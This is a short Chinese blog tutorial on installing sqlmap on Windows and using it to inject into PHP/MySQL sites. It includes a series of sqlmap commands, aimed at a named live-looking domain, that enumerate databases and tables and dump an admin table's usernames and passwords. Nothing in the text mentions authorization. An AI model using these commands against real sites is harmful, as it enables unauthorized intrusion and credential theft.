利用sqlmap進行php+mysql注入(windows環境)
老威SEO前段時間研究了一下sqlmap,其作為一款自動化的sql注入滲透工具,注入方式、注入成功后的取數據等等都是自動化的,非常適合我們這些小白前期玩玩滲透玩玩安全,它是用python寫的,因此需要先安裝python環境,一般都是傻瓜式安裝操作
一、sqlmap的安裝
1.python下載地址:
https://www.python.org/downloads/
2.sqlmap下載地址:
把下載的sqlmap壓縮包解壓到文件夾sqlmap中,并將其復制粘貼到 “C:\Python27” 目錄下(注:Python27為python安裝文件夾)
在桌面新建一個cmd的快捷方式,將其命名為“SQLMap”,并鍵入對象位置為:cmd,快捷方式名稱:SQLMap
雙擊剛才創建的快捷方式,輸入sqlmap.py -h,出現如下信息則表示安裝成功。
二、sqlmap的常用命令
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" 檢測注入
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" --current-user 獲取當前用戶 laowei@localhost
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" --current-db 獲取當前數據庫 如為db_inis
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" --tables -D db_inis
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables 獲取當前數據庫下所有表 如表為3
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user 獲取表3下的所有字段 如字段為4,5,6
sqlmap.py -u "http://m.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump 注入完成
最后:此文章還待更新中……請持續關注
